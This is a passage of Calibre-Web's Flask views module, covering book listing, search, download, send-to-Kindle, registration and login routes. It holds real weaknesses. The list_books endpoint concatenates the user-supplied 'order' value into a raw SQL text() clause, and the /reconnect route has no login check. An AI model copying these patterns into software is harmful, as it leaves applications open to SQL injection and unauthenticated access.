return render_books_list("newest", sort_param, 1, page)
@web.route('/<data>/<sort_param>', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/<book_id>', defaults={'page': 1})
@web.route('/<data>/<sort_param>/<book_id>/<int:page>')
@login_required_if_no_ano
def books_list(data, sort_param, book_id, page):
return render_books_list(data, sort_param, book_id, page)
@web.route("/table")
@login_required
def books_table():
visibility = current_user.view_settings.get('table', {})
return render_title_template('book_table.html', title=_(u"Books List"), page="book_table",
visiblility=visibility)
@web.route("/ajax/listbooks")
@login_required
def list_books():
off = int(request.args.get("offset") or 0)
limit = int(request.args.get("limit") or config.config_books_per_page)
search = request.args.get("search")
sort = request.args.get("sort", "id")
order = request.args.get("order", "").lower()
state = None
join = tuple()
if sort == "state":
state = json.loads(request.args.get("state", "[]"))
elif sort == "tags":
order = [db.Tags.name.asc()] if order == "asc" else [db.Tags.name.desc()]
join = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
elif sort == "series":
order = [db.Series.name.asc()] if order == "asc" else [db.Series.name.desc()]
join = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
elif sort == "publishers":
order = [db.Publishers.name.asc()] if order == "asc" else [db.Publishers.name.desc()]
join = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
elif sort == "authors":
order = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if order == "asc" \
else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
join = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
elif sort == "languages":
order = [db.Languages.lang_code.asc()] if order == "asc" else [db.Languages.lang_code.desc()]
join = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
elif order and sort in ["sort", "title", "authors_sort", "series_index"]:
order = [text(sort + " " + order)]
elif not state:
order = [db.Books.timestamp.desc()]
total_count = filtered_count = calibre_db.session.query(db.Books).count()
if state:
if search:
books = calibre_db.search_query(search).all()
filtered_count = len(books)
else:
books = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
entries = calibre_db.get_checkbox_sorted(books, state, off, limit, order)
elif search:
entries, filtered_count, __ = calibre_db.get_search_results(search, off, order, limit, *join)
else:
entries, __, __ = calibre_db.fill_indexpage((int(off) / (int(limit)) + 1), limit, db.Books, True, order, *join)
for entry in entries:
for index in range(0, len(entry.languages)):
entry.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
index].lang_code)
#try:
# entry.languages[index].language_name = LC.parse(entry.languages[index].lang_code)\
# .get_language_name(get_locale())
#except UnknownLocaleError:
# entry.languages[index].language_name = _(
# isoLanguages.get(part3=entry.languages[index].lang_code).name)
table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": entries}
js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
response = make_response(js_list)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@web.route("/ajax/table_settings", methods=['POST'])
@login_required
def update_table_settings():
# vals = request.get_json()
# ToDo: Save table settings
current_user.view_settings['table'] = json.loads(request.data)
try:
try:
flag_modified(current_user, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
log.error("Invalid request received: %r ", request, )
return "Invalid request", 400
return ""
@web.route("/author")
@login_required_if_no_ano
def author_list():
if current_user.check_visibility(constants.SIDEBAR_AUTHOR):
if current_user.get_view_property('author', 'dir') == 'desc':
order = db.Authors.sort.desc()
order_no = 0
else:
order = db.Authors.sort.asc()
order_no = 1
entries = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_authors_link.author')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
# If not creating a copy, readonly databases can not display authornames with "|" in it as changing the name
# starts a change session
autor_copy = copy.deepcopy(entries)
for entry in autor_copy:
entry.Authors.name = entry.Authors.name.replace('|', ',')
return render_title_template('list.html', entries=autor_copy, folder='web.books_list', charlist=charlist,
title=u"Authors", page="authorlist", data='author', order=order_no)
else:
abort(404)
@web.route("/downloadlist")
@login_required_if_no_ano
def download_list():
if current_user.get_view_property('download', 'dir') == 'desc':
order = ub.User.name.desc()
order_no = 0
else:
order = ub.User.name.asc()
order_no = 1
if current_user.check_visibility(constants.SIDEBAR_DOWNLOAD) and current_user.role_admin():
entries = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
.join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(order).all()
charlist = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
.group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Downloads"), page="downloadlist", data="download", order=order_no)
else:
abort(404)
@web.route("/publisher")
@login_required_if_no_ano
def publisher_list():
if current_user.get_view_property('publisher', 'dir') == 'desc':
order = db.Publishers.name.desc()
order_no = 0
else:
order = db.Publishers.name.asc()
order_no = 1
if current_user.check_visibility(constants.SIDEBAR_PUBLISHER):
entries = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_publishers_link.publisher')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Publishers"), page="publisherlist", data="publisher", order=order_no)
else:
abort(404)
@web.route("/series")
@login_required_if_no_ano
def series_list():
if current_user.check_visibility(constants.SIDEBAR_SERIES):
if current_user.get_view_property('series', 'dir') == 'desc':
order = db.Series.sort.desc()
order_no = 0
else:
order = db.Series.sort.asc()
order_no = 1
if current_user.get_view_property('series', 'series_view') == 'list':
entries = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Series"), page="serieslist", data="series")
else:
entries = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
.join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('grid.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Series"), page="serieslist", data="series", bodyClass="grid-view",
order=order_no)
else:
abort(404)
@web.route("/ratings")
@login_required_if_no_ano
def ratings_list():
if current_user.check_visibility(constants.SIDEBAR_RATING):
if current_user.get_view_property('ratings', 'dir') == 'desc':
order = db.Ratings.rating.desc()
order_no = 0
else:
order = db.Ratings.rating.asc()
order_no = 1
entries = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
(db.Ratings.rating / 2).label('name')) \
.join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_ratings_link.rating')).order_by(order).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
title=_(u"Ratings list"), page="ratingslist", data="ratings", order=order_no)
else:
abort(404)
@web.route("/formats")
@login_required_if_no_ano
def formats_list():
if current_user.check_visibility(constants.SIDEBAR_FORMAT):
if current_user.get_view_property('ratings', 'dir') == 'desc':
order = db.Data.format.desc()
order_no = 0
else:
order = db.Data.format.asc()
order_no = 1
entries = calibre_db.session.query(db.Data,
func.count('data.book').label('count'),
db.Data.format.label('format')) \
.join(db.Books).filter(calibre_db.common_filters()) \
.group_by(db.Data.format).order_by(order).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
title=_(u"File formats list"), page="formatslist", data="formats", order=order_no)
else:
abort(404)
@web.route("/language")
@login_required_if_no_ano
def language_overview():
if current_user.check_visibility(constants.SIDEBAR_LANGUAGE):
charlist = list()
if current_user.filter_language() == u"all":
languages = calibre_db.speaking_language()
# ToDo: generate first character list for languages
else:
#try:
# cur_l = LC.parse(current_user.filter_language())
#except UnknownLocaleError:
# cur_l = None
languages = calibre_db.session.query(db.Languages).filter(
db.Languages.lang_code == current_user.filter_language()).all()
languages[0].name = isoLanguages.get_language_name(get_locale(), languages[0].name.lang_code)
#if cur_l:
# languages[0].name = cur_l.get_language_name(get_locale())
#else:
# languages[0].name = _(isoLanguages.get(part3=languages[0].lang_code).name)
lang_counter = calibre_db.session.query(db.books_languages_link,
func.count('books_languages_link.book').label('bookcount')).group_by(
text('books_languages_link.lang_code')).all()
return render_title_template('languages.html', languages=languages, lang_counter=lang_counter,
charlist=charlist, title=_(u"Languages"), page="langlist",
data="language")
else:
abort(404)
@web.route("/category")
@login_required_if_no_ano
def category_list():
if current_user.check_visibility(constants.SIDEBAR_CATEGORY):
if current_user.get_view_property('category', 'dir') == 'desc':
order = db.Tags.name.desc()
order_no = 0
else:
order = db.Tags.name.asc()
order_no = 1
entries = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
.join(db.books_tags_link).join(db.Books).order_by(order).filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag')).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
.join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Categories"), page="catlist", data="category", order=order_no)
else:
abort(404)
# ################################### Task functions ################################################################
@web.route("/tasks")
@login_required
def get_tasks_status():
# if current user admin, show all email, otherwise only own emails
tasks = WorkerThread.getInstance().tasks
answer = render_task_status(tasks)
return render_title_template('tasks.html', entries=answer, title=_(u"Tasks"), page="tasks")
@app.route("/reconnect")
def reconnect():
calibre_db.reconnect_db(config, ub.app_DB_path)
return json.dumps({})
# ################################### Search functions ################################################################
@web.route("/search", methods=["GET"])
@login_required_if_no_ano
def search():
term = request.args.get("query")
if term:
return redirect(url_for('web.books_list', data="search", sort_param='stored', query=term))
else:
return render_title_template('search.html',
searchterm="",
result_count=0,
title=_(u"Search"),
page="search")
@web.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def advanced_search():
values = dict(request.form)
params = ['include_tag', 'exclude_tag', 'include_serie', 'exclude_serie', 'include_shelf', 'exclude_shelf',
'include_language', 'exclude_language', 'include_extension', 'exclude_extension']
for param in params:
values[param] = list(request.form.getlist(param))
flask_session['query'] = json.dumps(values)
return redirect(url_for('web.books_list', data="advsearch", sort_param='stored', query=""))
def adv_search_custom_columns(cc, term, q):
for c in cc:
if c.datatype == "datetime":
custom_start = term.get('custom_column_' + str(c.id) + '_start')
custom_end = term.get('custom_column_' + str(c.id) + '_end')
if custom_start:
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) >= func.datetime(custom_start)))
if custom_end:
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) <= func.datetime(custom_end)))
else:
custom_query = term.get('custom_column_' + str(c.id))
if custom_query != '' and custom_query is not None:
if c.datatype == 'bool':
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == (custom_query == "True")))
elif c.datatype == 'int' or c.datatype == 'float':
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == custom_query))
elif c.datatype == 'rating':
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == int(float(custom_query) * 2)))
else:
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.lower(db.cc_classes[c.id].value).ilike("%" + custom_query + "%")))
return q
def adv_search_language(q, include_languages_inputs, exclude_languages_inputs):
if current_user.filter_language() != "all":
q = q.filter(db.Books.languages.any(db.Languages.lang_code == current_user.filter_language()))
else:
for language in include_languages_inputs:
q = q.filter(db.Books.languages.any(db.Languages.id == language))
for language in exclude_languages_inputs:
q = q.filter(not_(db.Books.series.any(db.Languages.id == language)))
return q
def adv_search_ratings(q, rating_high, rating_low):
if rating_high:
rating_high = int(rating_high) * 2
q = q.filter(db.Books.ratings.any(db.Ratings.rating <= rating_high))
if rating_low:
rating_low = int(rating_low) * 2
q = q.filter(db.Books.ratings.any(db.Ratings.rating >= rating_low))
return q
def adv_search_read_status(q, read_status):
if read_status:
if config.config_read_column:
try:
if read_status == "True":
q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(db.cc_classes[config.config_read_column].value == True)
else:
q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
except (KeyError, AttributeError):
log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return q
else:
if read_status == "True":
q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(current_user.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(current_user.id),
coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
return q
def adv_search_extension(q, include_extension_inputs, exclude_extension_inputs):
for extension in include_extension_inputs:
q = q.filter(db.Books.data.any(db.Data.format == extension))
for extension in exclude_extension_inputs:
q = q.filter(not_(db.Books.data.any(db.Data.format == extension)))
return q
def adv_search_tag(q, include_tag_inputs, exclude_tag_inputs):
for tag in include_tag_inputs:
q = q.filter(db.Books.tags.any(db.Tags.id == tag))
for tag in exclude_tag_inputs:
q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
return q
def adv_search_serie(q, include_series_inputs, exclude_series_inputs):
for serie in include_series_inputs:
q = q.filter(db.Books.series.any(db.Series.id == serie))
for serie in exclude_series_inputs:
q = q.filter(not_(db.Books.series.any(db.Series.id == serie)))
return q
def adv_search_shelf(q, include_shelf_inputs, exclude_shelf_inputs):
q = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
.filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(exclude_shelf_inputs)))
if len(include_shelf_inputs) > 0:
q = q.filter(ub.BookShelf.shelf.in_(include_shelf_inputs))
return q
def extend_search_term(searchterm,
author_name,
book_title,
publisher,
pub_start,
pub_end,
tags,
rating_high,
rating_low,
read_status,
):
searchterm.extend((author_name.replace('|', ','), book_title, publisher))
if pub_start:
try:
searchterm.extend([_(u"Published after ") +
format_date(datetime.strptime(pub_start, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
pub_start = u""
if pub_end:
try:
searchterm.extend([_(u"Published before ") +
format_date(datetime.strptime(pub_end, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
pub_start = u""
elements = {'tag': db.Tags, 'serie':db.Series, 'shelf':ub.Shelf}
for key, db_element in elements.items():
tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['include_' + key])).all()
searchterm.extend(tag.name for tag in tag_names)
tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['exclude_' + key])).all()
searchterm.extend(tag.name for tag in tag_names)
language_names = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(tags['include_language'])).all()
if language_names:
language_names = calibre_db.speaking_language(language_names)
searchterm.extend(language.name for language in language_names)
language_names = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(tags['exclude_language'])).all()
if language_names:
language_names = calibre_db.speaking_language(language_names)
searchterm.extend(language.name for language in language_names)
if rating_high:
searchterm.extend([_(u"Rating <= %(rating)s", rating=rating_high)])
if rating_low:
searchterm.extend([_(u"Rating >= %(rating)s", rating=rating_low)])
if read_status:
searchterm.extend([_(u"Read Status = %(status)s", status=read_status)])
searchterm.extend(ext for ext in tags['include_extension'])
searchterm.extend(ext for ext in tags['exclude_extension'])
# handle custom columns
searchterm = " + ".join(filter(None, searchterm))
return searchterm, pub_start, pub_end
def render_adv_search_results(term, offset=None, order=None, limit=None):
order = order or [db.Books.sort]
pagination = None
cc = get_cc_columns(filter_config_custom_read=True)
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
q = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
.outerjoin(db.Series)\
.filter(calibre_db.common_filters(True))
# parse multiselects to a complete dict
tags = dict()
elements = ['tag', 'serie', 'shelf', 'language', 'extension']
for element in elements:
tags['include_' + element] = term.get('include_' + element)
tags['exclude_' + element] = term.get('exclude_' + element)
author_name = term.get("author_name")
book_title = term.get("book_title")
publisher = term.get("publisher")
pub_start = term.get("publishstart")
pub_end = term.get("publishend")
rating_low = term.get("ratinghigh")
rating_high = term.get("ratinglow")
description = term.get("comment")
read_status = term.get("read_status")
if author_name:
author_name = author_name.strip().lower().replace(',', '|')
if book_title:
book_title = book_title.strip().lower()
if publisher:
publisher = publisher.strip().lower()
searchterm = []
cc_present = False
for c in cc:
if c.datatype == "datetime":
column_start = term.get('custom_column_' + str(c.id) + '_start')
column_end = term.get('custom_column_' + str(c.id) + '_end')
if column_start:
searchterm.extend([u"{} >= {}".format(c.name,
format_date(datetime.strptime(column_start, "%Y-%m-%d"),
format='medium',
locale=get_locale())
)])
cc_present = True
if column_end:
searchterm.extend([u"{} <= {}".format(c.name,
format_date(datetime.strptime(column_end, "%Y-%m-%d").date(),
format='medium',
locale=get_locale())
)])
cc_present = True
elif term.get('custom_column_' + str(c.id)):
searchterm.extend([(u"{}: {}".format(c.name, term.get('custom_column_' + str(c.id))))])
cc_present = True
if any(tags.values()) or author_name or book_title or publisher or pub_start or pub_end or rating_low \
or rating_high or description or cc_present or read_status:
searchterm, pub_start, pub_end = extend_search_term(searchterm,
author_name,
book_title,
publisher,
pub_start,
pub_end,
tags,
rating_high,
rating_low,
read_status)
q = q.filter()
if author_name:
q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_name + "%")))
if book_title:
q = q.filter(func.lower(db.Books.title).ilike("%" + book_title + "%"))
if pub_start:
q = q.filter(func.datetime(db.Books.pubdate) > func.datetime(pub_start))
if pub_end:
q = q.filter(func.datetime(db.Books.pubdate) < func.datetime(pub_end))
q = adv_search_read_status(q, read_status)
if publisher:
q = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + publisher + "%")))
q = adv_search_tag(q, tags['include_tag'], tags['exclude_tag'])
q = adv_search_serie(q, tags['include_serie'], tags['exclude_serie'])
q = adv_search_shelf(q, tags['include_shelf'], tags['exclude_shelf'])
q = adv_search_extension(q, tags['include_extension'], tags['exclude_extension'])
q = adv_search_language(q, tags['include_language'], tags['exclude_language'])
q = adv_search_ratings(q, rating_high, rating_low)
if description:
q = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + description + "%")))
# search custom culumns
try:
q = adv_search_custom_columns(cc, term, q)
except AttributeError as ex:
log.debug_or_exception(ex)
flash(_("Error on search for custom columns, please restart Calibre-Web"), category="error")
q = q.order_by(*order).all()
flask_session['query'] = json.dumps(term)
ub.store_ids(q)
result_count = len(q)
if offset != None and limit != None:
offset = int(offset)
limit_all = offset + int(limit)
pagination = Pagination((offset / (int(limit)) + 1), limit, result_count)
else:
offset = 0
limit_all = result_count
return render_title_template('search.html',
adv_searchterm=searchterm,
pagination=pagination,
entries=q[offset:limit_all],
result_count=result_count,
title=_(u"Advanced Search"), page="advsearch")
@web.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def advanced_search_form():
# Build custom columns names
cc = get_cc_columns(filter_config_custom_read=True)
return render_prepare_search_form(cc)
# ################################### Download/Send ##################################################################
@web.route("/cover/<int:book_id>")
@login_required_if_no_ano
def get_cover(book_id):
return get_book_cover(book_id)
@web.route("/robots.txt")
def get_robots():
return send_from_directory(constants.STATIC_DIR, "robots.txt")
@web.route("/show/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/show/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@viewer_required
def serve_book(book_id, book_format, anyname):
book_format = book_format.split(".")[0]
book = calibre_db.get_book(book_id)
data = calibre_db.get_book_format(book_id, book_format.upper())
if not data:
return "File not in Database"
log.info('Serving book: %s', data.name)
if config.config_use_google_drive:
try:
headers = Headers()
headers["Content-Type"] = mimetypes.types_map.get('.' + book_format, "application/octet-stream")
df = getFileFromEbooksFolder(book.path, data.name + "." + book_format)
return do_gdrive_download(df, headers, (book_format.upper() == 'TXT'))
except AttributeError as ex:
log.debug_or_exception(ex)
return "File Not Found"
else:
if book_format.upper() == 'TXT':
try:
rawdata = open(os.path.join(config.config_calibre_dir, book.path, data.name + "." + book_format),
"rb").read()
result = chardet.detect(rawdata)
return make_response(
rawdata.decode(result['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
except FileNotFoundError:
log.error("File Not Found")
return "File Not Found"
return send_from_directory(os.path.join(config.config_calibre_dir, book.path), data.name + "." + book_format)
@web.route("/download/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/download/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@download_required
def download_link(book_id, book_format, anyname):
client = "kobo" if "Kobo" in request.headers.get('User-Agent') else ""
return get_download_link(book_id, book_format, client)
@web.route('/send/<int:book_id>/<book_format>/<int:convert>')
@login_required
@download_required
def send_to_kindle(book_id, book_format, convert):
if not config.get_mail_server_configured():
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
elif current_user.kindle_mail:
result = send_mail(book_id, book_format, convert, current_user.kindle_mail, config.config_calibre_dir,
current_user.name)
if result is None:
flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=current_user.kindle_mail),
category="success")
ub.update_download(book_id, int(current_user.id))
else:
flash(_(u"Oops! There was an error sending this book: %(res)s", res=result), category="error")
else:
flash(_(u"Please update your profile with a valid Send to Kindle E-mail Address."), category="error")
if "HTTP_REFERER" in request.environ:
return redirect(request.environ["HTTP_REFERER"])
else:
return redirect(url_for('web.index'))
# ################################### Login Logout ##################################################################
@web.route('/register', methods=['GET', 'POST'])
def register():
if not config.config_public_reg:
abort(404)
if current_user is not None and current_user.is_authenticated:
return redirect(url_for('web.index'))
if not config.get_mail_server_configured():
flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
if request.method == "POST":
to_save = request.form.to_dict()
nickname = to_save["email"].strip() if config.config_register_email else to_save.get('name')
if not nickname or not to_save.get("email"):
flash(_(u"Please fill out all fields!"), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
try:
nickname = check_username(nickname)
email = check_email(to_save["email"])
except Exception as ex:
flash(str(ex), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
content = ub.User()
if check_valid_domain(email):
content.name = nickname
content.email = email
password = generate_random_password()
content.password = generate_password_hash(password)
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
try:
ub.session.add(content)
ub.session.commit()
if feature_support['oauth']:
register_user_with_oauth(content)
send_registration_mail(to_save["email"].strip(), nickname, password)
except Exception:
ub.session.rollback()
flash(_(u"An unknown error occurred. Please try again later."), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
else:
flash(_(u"Your e-mail is not allowed to register"), category="error")
log.warning('Registering failed for user "%s" e-mail address: %s', nickname, to_save["email"])
return render_title_template('register.html', title=_("Register"), page="register")
flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
return redirect(url_for('web.login'))
if feature_support['oauth']:
register_user_with_oauth()
return render_title_template('register.html', config=config, title=_("Register"), page="register")
@web.route('/login', methods=['GET', 'POST'])
def login():
#if not config.db_configured:
# log.debug(u"Redirect to initial configuration")
# return redirect(url_for('admin.basic_configuration'))
if current_user is not None and current_user.is_authenticated:
return redirect(url_for('web.index'))
if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
log.error(u"Cannot activate LDAP authentication")
flash(_(u"Cannot activate LDAP authentication"), category="error")
if request.method == "POST":
form = request.form.to_dict()
user = ub.session.query(ub.User).filter(func.lower(ub.User.name) == form['username'].strip().lower()) \
.first()
if config.config_login_type == constants.LOGIN_LDAP and services.ldap and user and form['password'] != "":
login_result, error = services.ldap.bind_user(form['username'], form['password'])
if login_result:
login_user(user, remember=bool(form.get('remember_me')))
ub.store_user_session()
log.debug(u"You are now logged in as: '%s'", user.name)
flash(_(u"you are now logged in as: '%(nickname)s'", nickname=user.name),
category="success")
return redirect_back(url_for("web.index"))
elif login_result is None and user and check_password_hash(str(user.password), form['password']) \
and user.name != "Guest":
login_user(user, remember=bool(form.get('remember_me')))
ub.store_user_session()
log.info("Local Fallback Login as: '%s'", user.name)
flash(_(u"Fallback Login as: '%(nickname)s', LDAP Server not reachable, or user not known",
nickname=user.name),
category="warning")
return redirect_back(url_for("web.index"))
elif login_result is None:
log.info(error)
flash(_(u"Could not login: %(message)s", message=error), category="error")
else:
ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
log.warning('LDAP Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
flash(_(u"Wrong Username or Password"), category="error")
else:
ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
if 'forgot' in form and form['forgot'] == 'forgot':
if user != None and user.name != "Guest":
ret, __ = reset_password(user.id)
if ret == 1:
flash(_(u"New Password was send to your email address"), category="info")
log.info('Password reset for user "%s" IP-address: %s', form['username'], ip_Address)
else:
log.error(u"An unknown error occurred. Please try again later")
flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
flash(_(u"Please enter valid username to reset password"), category="error")
log.warning('Username missing for password reset IP-address: %s', ip_Address)
else:
if user and check_password_hash(str(user.password), form['password']) and user.name != "Guest":
login_user(user, remember=bool(form.get('remember_me')))
ub.store_user_session()
log.debug(u"You are now logged in as: '%s'", user.name)
flash(_(u"You are now logged in as: '%(nickname)s'", nickname=user.name), category="success")
config.config_is_initial = False
return redirect_back(url_for("web.index"))
else:
log.warning('Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
flash(_(u"Wrong Username or Password"), category="error")
next_url = request.args.get('next', default=url_for("web.index"), type=str)
if url_for("web.logout") == next_url:
next_url = url_for("web.index")
return render_title_template('login.html',
title=_(u"Login"),
next_url=next_url,
config=config,
oauth_check=oauth_check,
mail=config.get_mail_server_configured(), page="login")
@web.route('/logout')
@login_required
def logout():
if current_user is not None and current_user.is_authenticated:
ub.delete_user_session(current_user.id, flask_session.get('_id',""))
logout_user()
if feature_support['oauth'] and (config.config_login_type == 2 or config.config_login_type == 3):
logout_oauth_user()
log.debug(u"User logged out")
return redirect(url_for('web.login'))
# ################################### Users own configuration #########################################################
def change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages):
to_save = request.form.to_dict()
current_user.random_books = 0
if current_user.role_passwd() or current_user.role_admin():
if to_save.get("password"):
current_user.password = generate_password_hash(to_save["password"])
try:
if to_save.get("kindle_mail", current_user.kindle_mail) != current_user.kindle_mail:
current_user.kindle_mail = valid_email(to_save["kindle_mail"])
if to_save.get("email", current_user.email) != current_user.email:
current_user.email = check_email(to_save["email"])
if current_user.role_admin():
if to_save.get("name", current_user.name) != current_user.name:
# Query User name, if not existing, change
current_user.name = check_username(to_save["name"])
current_user.random_books = 1 if to_save.get("show_random") == "on" else 0
if to_save.get("default_language"):
current_user.default_language = to_save["default_language"]
if to_save.get("locale"):
current_user.locale = to_save["locale"]
current_user.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html",
content=current_user,
translations=translations,
profile=1,
languages=languages,
title=_(u"%(name)s's profile", name=current_user.name),
page="me",
kobo_support=kobo_support,
registered_oauth=local_oauth_check,
oauth_status=oauth_status)
val = 0
for key, __ in to_save.items():
if key.startswith('show'):
val += int(key[5:])
current_user.sidebar_view = val
if to_save.get("Show_detail_random"):
current_user.sidebar_view += constants.DETAIL_RANDOM
try:
ub.session.commit()
flash(_(u"Profile updated"), category="success")
log.debug(u"Profile updated")
except IntegrityError:
ub.session.rollback()
flash(_(u"Found an existing account for this e-mail address"), category="error")
log.debug(u"Found an existing account for this e-mail address")
except OperationalError as e:
ub.session.rollback()
log.error("Database error: %s", e)
flash(_(u"Database error: %(error)s.", error=e), category="error")
@web.route("/me", methods=["GET", "POST"])
@login_required
def profile():
languages = calibre_db.speaking_language()
translations = babel.list_translations() + [LC('en')]
kobo_support = feature_support['kobo'] and config.config_kobo_sync
